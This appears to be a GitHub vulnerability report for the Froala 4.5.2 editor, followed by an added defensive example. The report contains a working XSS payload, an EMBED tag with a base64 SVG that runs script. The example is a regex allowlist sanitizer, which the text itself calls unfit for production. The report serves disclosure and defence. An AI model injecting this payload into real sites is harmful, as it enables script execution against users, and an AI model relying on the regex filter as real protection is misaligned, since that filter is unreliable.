
Cross-Site Scripting (XSS) Vulnerability in Froala 4.5.2 #564

@joshuaguinness

Description

Hello,

I've recently discovered an XSS security vulnerability while using the newest version of the Froala editor (4.5.2).

System:

  • Windows: 11
  • Chrome: 138.0.7204.50
  • angular-froala-wysiwyg: 4.5.2

Steps to reproduce:

  1. Open the basic JS Fiddle here
  2. Click on the "Code View" icon to switch to code view
  3. Copy in the below code:

```html
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
```

  4. Click the "Code View" button again to switch out of code view
  5. You should see the popup of the XSS.

Let me know if there is anything we can do on our end to prevent these kinds of XSS issues, or whether a bug fix can be released in an upcoming version.

The specific XSS payload I pulled from the list here. I believe that there may be other payloads that work as well. I usually just copy a whole chunk of payloads into the Froala Code View editor and see what pops.
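The report asks what an integrator can do on their own side. The block below is an added example written for this page, not code from Froala or from the reporter. It first decodes the data: URL in the posted payload to show the SVG document with its `<script>` element that the EMBED would load, then runs editor HTML through an allowlist filter of the kind that should sit between the editor output and storage or rendering. The tag and attribute lists (`ALLOWED_TAGS`, `ALLOWED_ATTRS`) and the `SAFE_URL` scheme check are illustrative choices made here, not Froala settings; the `decodeDataUrl` and `sanitize` functions are hypothetical helpers. It runs under Node and uses only the global `Buffer`.

```javascript
// Added example, not Froala's code. Shows why the reported payload executes
// (the EMBED loads an SVG that carries a <script>) and demonstrates an
// allowlist filter for HTML coming out of the editor.

// Payload as posted in the report; the whitespace inside the base64 is kept
// as posted because browsers ignore ASCII whitespace when parsing a data: URL.
const PAYLOAD_SRC = 'data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==';
const PAYLOAD = `<EMBED SRC="${PAYLOAD_SRC}" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`;

// Decode a data: URL the way a browser would, so a reviewer can see the
// document the EMBED actually loads. Returns null for non-data: URLs.
function decodeDataUrl(url) {
  const m = /^data:([^;,]*)(;base64)?,(.*)$/is.exec(url);
  if (!m) return null;
  const data = m[3].replace(/\s+/g, '');
  const body = m[2]
    ? Buffer.from(data, 'base64').toString('utf8')
    : decodeURIComponent(data);
  return { mime: m[1], body };
}

// Allowlist (illustrative, chosen for this example). Anything not listed
// (EMBED, OBJECT, SCRIPT, IFRAME, SVG, on* handlers, AllowScriptAccess, ...)
// is dropped rather than denylisted.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'em', 'strong', 'u', 'a',
  'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'img']);
const ALLOWED_ATTRS = new Set(['href', 'src', 'alt', 'title']);
// URL attributes may be relative, a fragment, http(s) or mailto.
// data: and javascript: carry a colon with a disallowed scheme and fail this test.
const SAFE_URL = /^(?:https?:|mailto:|\/|#|[^:]*$)/i;

// Rewrite each tag: drop disallowed elements, keep only allowlisted attributes,
// and reject src/href values whose scheme is not allowlisted. Text between
// tags is passed through unchanged.
function sanitize(html) {
  const attrRe = /([a-z_:-][a-z0-9_:.-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/gi;
  return html.replace(/<\/?([a-z][a-z0-9]*)\b([^>]*)>/gi, (tag, name, attrs) => {
    const lname = name.toLowerCase();
    if (!ALLOWED_TAGS.has(lname)) return '';        // unknown element: remove the tag
    if (tag.startsWith('</')) return `</${lname}>`;
    const kept = [];
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(attrs)) !== null) {
      const aname = a[1].toLowerCase();
      if (!ALLOWED_ATTRS.has(aname)) continue;      // drops onload, style, AllowScriptAccess, ...
      const value = (a[2] ?? a[3] ?? a[4] ?? '').trim();
      // Remove whitespace and control characters before the scheme check;
      // browsers ignore them, so "java\tscript:" would otherwise slip through.
      const probe = value.replace(/[\s\u0000-\u001f]/g, '');
      if ((aname === 'href' || aname === 'src') && !SAFE_URL.test(probe)) continue;
      kept.push(`${aname}="${value.replace(/"/g, '&quot;')}"`);
    }
    return `<${lname}${kept.length ? ' ' + kept.join(' ') : ''}>`;
  });
}

// Stand-alone demonstration on the reported payload and a constructed sample.
const SAMPLE = '<p onclick="x()">Hi <a href="javascript:alert(1)">x</a> <IMG SRC="https://example.com/a.png"></p>';
console.log(decodeDataUrl(PAYLOAD_SRC).body);   // the SVG with its <script> element
console.log(JSON.stringify(sanitize(PAYLOAD))); // "" : the EMBED is removed entirely
console.log(sanitize(SAMPLE));                  // <p>Hi <a>x</a> <img src="https://example.com/a.png"></p>
```

Two practitioner notes. First, the regex-based filter above exists to make the allowlist principle concrete; real HTML has comments, CDATA, unbalanced quotes and entity encodings that a regex will mishandle, so for production use a maintained sanitizer (DOMPurify in the browser, or a server-side equivalent) on the untrusted HTML at the point of storage and again at render, and pair it with a Content Security Policy that does not permit inline script. Second, the filter must run on the server: anything done inside the editor, including Froala's own code-view handling, is bypassable by a user who submits the HTML directly.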
